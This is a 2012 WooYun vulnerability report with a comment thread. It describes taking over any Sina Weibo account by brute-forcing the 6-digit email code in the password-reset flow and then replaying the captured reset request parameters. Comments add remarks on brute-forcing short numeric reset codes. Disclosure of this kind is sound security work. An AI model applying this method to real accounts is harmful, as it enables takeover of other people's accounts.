漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:新浪微搏修改任意用户密码
相关厂商:新浪
提交时间:2012-07-10 23:46
修复时间:2012-07-11 12:08
公开时间:2012-07-11 12:08
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情 披露状态:
2012-07-10: 细节已通知厂商并且等待厂商处理中 2012-07-11: 厂商已经主动忽略漏洞,细节向公众公开
简要描述: 和最近爆的几个修改任意用户密码的漏洞有些点相似.知道帐号就能修改密码.
详细说明: 弱伪随机数引起的问题.下面附上详细过程. 使用新浪微搏帐号的密码找回功能
首先选择安全邮箱找回密码
跳转到此页面.6位数字.000000-999999范围.如果没有尝试次数的限制,破解是很容易的.我们继续向下看.
从邮箱查看到真实的验证码为746486 然后我们回到密码找回页面输入正确的验证码来尝试修改密码.
loginname=5447055%40qq.com&uid=2393972150×tamp=1341933068&ag=&m=f06f8b141fea148217d15f3939b0cac1&_email=5447055%40qq.com&confirm=746486
在提交的时候抓到上面的包文内容
因为有密码强度的限制.于是我把密码修改为asdasd123
抓到如下内容
loginname=5447055%40qq.com&uid=2393972150×tamp=1341933068&ag=&m=f06f8b141fea148217d15f3939b0cac1&_confirm=746486&m2=edcf24f53e86e9c23f82e28458ba647e&password=b381431d2daf7c7d0f11e496510abef6405e491fabc26bc87e144dc5f52f6e24b40a8dfde7fc7e42e4261483d87f31dcc85bd704aff45f29c0c7bc122beaadcb2aead81e621f36070e50d1607d91457b8f2065079920cb7bf18acaebdfbda09c2985fc08a9129591654c997dab97fde294dba9f8160d50889e544233d25f41bf&cpassword=248798cfcafceb43041a883ebdd515ceb90622b01c2b4ed03979c1aa97d516a1c6de42fa970c60c7962f9336bb03e5cbd32632d03f47623326178374b8216df76578f9c88d12ee7239ce2bcd43ba965f26def411b69c90a43c8e7428829e0d674d58d1a9a786b2e904ac854e46677563f20d236423ff483ce0486e0ad6fe9bea
对比了一下.找到相同的参数如下 loginname uid timestamp ag m confirm 剩余的参数我猜想应该是我修改的新密码. 也就是说.我只要有以上参数就可以修改密码了. 上述参数中,除confirm外都是已知的,也就是说只有那个6位随机数需要我们去破解.就可以修改密码了.我来做一个这样的尝试.
聪明的同学们看懂了么? 图中马赛克部分为我的cookies
在长达10几分钟的破解时间后.通过使用回包大小的排序, 我看到得到了上图中所示的这个随机码. 668707,然后看这个验证码的回包中有如下关键词.
<ul class="W_f14 W_fb topic_list clearfix"> <li>设置新密码</li> </ul> <div class="form_table"> <dl class="clearfix"> <dt>新密码:</dt> <dd class="conbox"> <input type="password" class="W_inputStp width1" name="password" node-type="password" />
也就是说找到了正确的验证码.但这个时候找回密码的页面已经超时了. 我们在回包中找找上文中我们所需要的几个参数,找到如下内容
<div class="form_cloud_con"><form name="setpassword" id="setpassword" action="" method="post"> <input type="hidden" name="loginname" value="5447055@qq.com" /> <input type="hidden" name="uid" value="2393972150" /> <input type="hidden" name="timestamp" value="1341934162" /> <input type="hidden" name="ag" value="" /> <input type="hidden" name="m" value="9fb40f6ce6c6d0449674b9ca2211eb13" /> <input type="hidden" name="_confirm" value="668707" /> <input type="hidden" name="m2" value="57bf4004860b27ee006c611fc7a4ac63" /> <dl><dd class="space_b">
然后下面大家都知道了.构造上文中那个修改密码的包.修改密码就好了.... 结束.
漏洞证明: 修复方案: 不要使用这类弱伪随机数做为找回密码的凭证,也不要不限制尝试次数.
漏洞回应 厂商回应: 危害等级:无影响厂商忽略
忽略时间:2012-07-11 12:08
厂商回复: 感谢only_guest反馈的该问题,要利用该问题,需在获知用户个人信息的前提下,通过暴力破解来实现。实际危害较轻微。新浪一直以来都在全力保护用户安全,暴力破解的问题,目前已经解决,请各位用户放心。 故对该问题进行”忽略“(公开)处理。请only_guest将联系方式发送给我们,我们将提供一份礼品表示感谢。感谢各位对新浪安全的支持!
漏洞Rank:18 (WooYun评价)
最新状态: 暂无
漏洞评价:
评论
2012-07-10 23:48 |
gainover ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
2012-07-10 23:48 |
testcvc ( 路人 | Rank:5 漏洞数:1 | test)
2012-07-10 23:49 |
gainover ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
2012-07-10 23:51 |
gainover ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
2012-07-10 23:51 |
only_guest ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)
2012-07-10 23:52 |
gainover ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
@only_guest 正准备去睡么,刷新了下乌云,就看到你这个标题,亮下了我的狗眼。。
2012-07-10 23:53 |
闪电小子 ( 实习白帽子 | Rank:63 漏洞数:5 | PKAV技术宅社区!---闪电小子!)
@gainover 好想法,哈哈!更加有证明力呀!
2012-07-11 00:00 |
小乖 ( 路人 | Rank:21 漏洞数:6 | 这个家伙很懒,什么也没留下。)
2012-07-11 00:03 |
only_guest ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)
2012-07-11 00:07 |
Moments ( 实习白帽子 | Rank:55 漏洞数:10 | 2)
2012-07-11 00:25 |
Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)
擦。。。。。。。。。。。。。。牛b啊。。居然还放出来了。。新浪要送lz一箱公仔了。。。
2012-07-11 00:38 |
yy520 ( 普通白帽子 | Rank:139 漏洞数:12 )
2012-07-11 00:43 |
only_guest ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)
2012-07-11 03:08 |
数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)
2012-07-11 08:06 |
koohik ( 普通白帽子 | Rank:542 漏洞数:63 | 没什么介绍的http://www.koohik.com/)
2012-07-11 08:48 |
imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )
2012-07-11 08:55 |
an1k3r ( 普通白帽子 | Rank:474 漏洞数:40 | 0.0)
2012-07-11 09:09 |
一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | PKAV技术宅社区-安全爱好者)
2012-07-11 09:21 |
白胡子 ( 路人 | Rank:24 漏洞数:3 )
2012-07-11 09:21 |
xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)
2012-07-11 09:22 |
牛£金钢 ( 路人 | Rank:12 漏洞数:4 | 我是新手,还需要学习,大神们要指点下了.....)
微博已经几天登录不上了,难道就是这个原因被改密码了
2012-07-11 09:30 |
unic02n ( 实习白帽子 | Rank:73 漏洞数:9 | 我是来学习的!)
2012-07-11 09:33 |
king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)
难不成 判定key用的是uid,改密码用的是username???
2012-07-11 09:34 |
shine ( 普通白帽子 | Rank:831 漏洞数:77 | coder)
2012-07-11 09:41 |
蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)
2012-07-11 09:41 |
十九楼 (乌云厂商)
2012-07-11 09:46 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
2012-07-11 10:00 |
p.z ( 普通白帽子 | Rank:411 漏洞数:40 )
2012-07-11 10:06 |
疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)
2012-07-11 10:52 |
koohik ( 普通白帽子 | Rank:542 漏洞数:63 | 没什么介绍的http://www.koohik.com/)
2012-07-11 11:02 |
livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)
2012-07-11 11:05 |
only_guest ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)
@livers 不知道.懒得去测试.昨晚测试没补.
2012-07-11 11:07 |
WooYuner ( 路人 | Rank:0 漏洞数:1 | 没有准备,就是准备失败)
2012-07-11 11:09 |
wszf ( 路人 | Rank:24 漏洞数:3 | 打酱油)
2012-07-11 11:10 |
livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)
@only_guest 试下嘛 我都忙活一早上了 水太深了
2012-07-11 11:15 |
horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)
2012-07-11 11:15 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
2012-07-11 11:17 |
her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)
2012-07-11 11:20 |
天一生水 ( 路人 | Rank:0 漏洞数:2 )
2012-07-11 11:29 |
Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)
这尼玛逆天啊,别公开啊,要不很多大牛的帐号不保。。。
2012-07-11 11:30 |
FlyR4nk ( 普通白帽子 | Rank:119 漏洞数:18 )
2012-07-11 11:31 |
牛£金钢 ( 路人 | Rank:12 漏洞数:4 | 我是新手,还需要学习,大神们要指点下了.....)
2012-07-11 11:37 |
天一生水 ( 路人 | Rank:0 漏洞数:2 )
@Hxai11 这么大的事,新浪肯定会修复的....银家只不过去别的站点试试么........
2012-07-11 11:40 |
一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | PKAV技术宅社区-安全爱好者)
2012-07-11 11:43 |
Valo洛洛 ( 普通白帽子 | Rank:458 漏洞数:52 | 。)
“要利用该问题,需在获知足够用户个人信息的前提下,通过暴力破解来实现。实际危害轻微。我们一直以来都在全力保护用户安全,暴力破解的问题,目前正在解决,请各位用户放心。”新浪的微博回复,是真的轻微呢还是被轻微了= =
2012-07-11 11:48 |
Topman王 ( 实习白帽子 | Rank:31 漏洞数:6 | 软件开发工程师!白帽子!XSSER,渗透,SEO)
2012-07-11 11:50 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
2012-07-11 11:51 |
闪电小子 ( 实习白帽子 | Rank:63 漏洞数:5 | PKAV技术宅社区!---闪电小子!)
@Valo洛洛 也不需要太多的信息!知道帐号就行了!
2012-07-11 12:09 |
itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )
2012-07-11 12:11 |
also ( 普通白帽子 | Rank:424 漏洞数:52 | 招渗透/php/前端/ios&android安全,广州地...)
2012-07-11 12:11 |
imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )
2012-07-11 12:13 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
2012-07-11 12:14 |
only_guest ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)
2012-07-11 12:16 |
also ( 普通白帽子 | Rank:424 漏洞数:52 | 招渗透/php/前端/ios&android安全,广州地...)
@only_guest @xsser 都是你们的错,应该让砸门玩会儿蛋,然后再上缴
2012-07-11 12:17 |
her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)
2012-07-11 12:18 |
FlyR4nk ( 普通白帽子 | Rank:119 漏洞数:18 )
2012-07-11 12:20 |
zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)
2012-07-11 12:21 |
only_guest ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)
@zhk 木有人联系我.只是微搏扩散比较速度.新浪怕造成负面影响.就迅速修补公开了.
2012-07-11 12:21 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
@only_guest 类似的问题 下次喊我帮你测试个大V吧 实事求是
2012-07-11 12:23 |
horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)
@xsser 新浪的“忽略”后面有两个字:公开。应该是指希望迅速公开真实情况的意思吧?
2012-07-11 12:24 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
@horseluke 额,那应该添加一个确认并且公开的功能?
2012-07-11 12:27 |
horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)
@xsser 估计即使有这个选项厂商也不知道怎么用......毕竟希望迅速公开的厂商太少了
2012-07-11 12:39 |
king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)
2012-07-11 12:40 |
Jannock ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)
刚试了一下,主要难点1、知道登陆帐号2、知道保密邮箱3、在短时间内暴破
2012-07-11 12:40 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
2012-07-11 12:45 |
Jannock ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)
在找回密码方面,目前大部分通过手机找回密码的都是4位数字,让暴破情何以堪。。。
2012-07-11 12:46 |
king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)
@xsser 这当然知道 0-9和a-z 组合的密码次数爆破时间肯定不一样吗 好像我记得是数字吧!!!n久看的代码 具体的忘了
2012-07-11 12:49 |
king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)
只不过是 6位随机码跟用户 时间一起组合过吧可以写个程序 暴力6位数 +组合 暴力 ,只不过不能跟楼主这样暴力吧
2012-07-11 12:53 |
horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)
@Jannock “大部分通过手机找回密码的都是4位数字”......其实不怎么明白为啥都喜欢数字找回,又不是用在自助终端上......
2012-07-11 12:55 |
Valo洛洛 ( 普通白帽子 | Rank:458 漏洞数:52 | 。)
2012-07-11 13:00 |
king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)
@horseluke 这个呢 为什么是数字呢,,用户体验的考虑
2012-07-11 13:06 |
『 Change_era 』 ( 路人 | Rank:18 漏洞数:1 | 追逐时代的脚步,奋斗向上,努力先前进。)
2012-07-11 13:16 |
only_guest ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)
2012-07-11 14:04 |
一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | PKAV技术宅社区-安全爱好者)
我擦,我就说嘛,这个随机码没来源啊;原来是我思想不够流氓~~新浪明显被轻微了~~洞主用的啥工具,我就想到了溯雪
2012-07-11 14:07 |
tpu01yzx ( 实习白帽子 | Rank:58 漏洞数:8 | test)
@only_guest 其实,这应该有个“离线”版本的。不解释。
2012-07-11 14:31 |
Mr.杨总 ( 路人 | Rank:14 漏洞数:4 | 绿色 无毒 你懂得。。。。心要宽 。。。)
2012-07-11 14:51 |
Aの碎碎念 ( 路人 | Rank:11 漏洞数:4 | 腐宅求妹子~)
你妹啊,还无影响~!! 下次改个小秘书的密码发一次~~
2012-07-11 14:56 |
zeracker ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)
2012-07-11 15:48 |
we8i ( 路人 | Rank:5 漏洞数:1 | 90sec的)
2012-07-11 15:52 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
2012-07-11 15:55 |
we8i ( 路人 | Rank:5 漏洞数:1 | 90sec的)
2012-07-11 17:38 |
_Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)
@only_guest @xsser "需在获知用户个人信息的前提下,通过暴力破解来实现。实际危害较轻微。"--危害轻?"暴力破解的问题,目前已经解决,请各位用户放心。故对该问题进行”忽略“(公开)处理。"解决了忽略.叫轻?危害其实不低了,一般都知道别人QQ知道邮箱的特别是名人的....如xsser @_@表达不当啊@_@危害轻微就修复了,还忽略
2012-07-11 17:41 |
天一生水 ( 路人 | Rank:0 漏洞数:2 )
没想当人家直接忽视了.........你那公仔飞走了..他说的防暴力破解就只有时间限制跟尝试次数么????求大妞们解答....
2012-07-11 18:26 |
horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)
2012-07-11 22:45 |
『 Change_era 』 ( 路人 | Rank:18 漏洞数:1 | 追逐时代的脚步,奋斗向上,努力先前进。)
2012-07-12 15:09 |
leehenwu ( 普通白帽子 | Rank:194 漏洞数:24 | 撸·啊·撸)
2012-07-12 16:59 |
凤凰 ( 路人 | Rank:15 漏洞数:6 | 涅磐)
2012-07-13 09:09 |
Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)
@Jannock @horseluke 话说那qq的手机令牌,有破解的可能性吗?首先,令牌随机验证码是30秒换一次,而且随机码是6位数的,我不知道最高值是多少,且有时间校准方案,请问像这样有办法破解吗?
2012-07-13 11:26 |
tpu01yzx ( 实习白帽子 | Rank:58 漏洞数:8 | test)
@Hxai11 才6位数,基本上普通PC可以破10位纯数字,个人觉得可破性比较高,如果还是使用系统自带的随机数生成器的话。不过首先我需要手机令牌的代码,知道里面是如何操作的。
2012-07-13 13:10 |
her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)
修改密码的URL之允许正确点击一次的情况下 以上的漏洞还能利用么?猜测的过程猜测正确是不是就是一次200,等你第二次访问浏览器修改密码的时候这个URL就已经失效了。百度还是神马貌似就是只能点击一次修改密码的URL.很多都是24小时有效,但是没有限制次数。
2012-07-13 20:58 |
tpu01yzx ( 实习白帽子 | Rank:58 漏洞数:8 | test)
@her0ma 那是正确情况下只能一次有效,错误情况下就不是这样的啦,否则很容易被人恶意攻击,导致合法用户也无法重置密码了。
2012-07-15 21:22 |
her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)
@tpu01yzx 用工具猜测一次200 然后获取了URL 第二次浏览器访问的时候应该已经就失效了~ 所以还是比较有压力的!
2012-07-16 09:36 |
unic02n ( 实习白帽子 | Rank:73 漏洞数:9 | 我是来学习的!)
@Jannock 确实是有不小的难度,真心不觉得够18分。
2012-07-16 09:45 |
一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | PKAV技术宅社区-安全爱好者)
@her0ma 新浪之前的机制是有问题的,验证码30分钟有效期,只要验证码正确验证后,会跳入下一步改密码的流程,这个时候带入前面的所有参数,包括刚刚验证成功的验证码信息。所以很容易成功的,危害还是很大的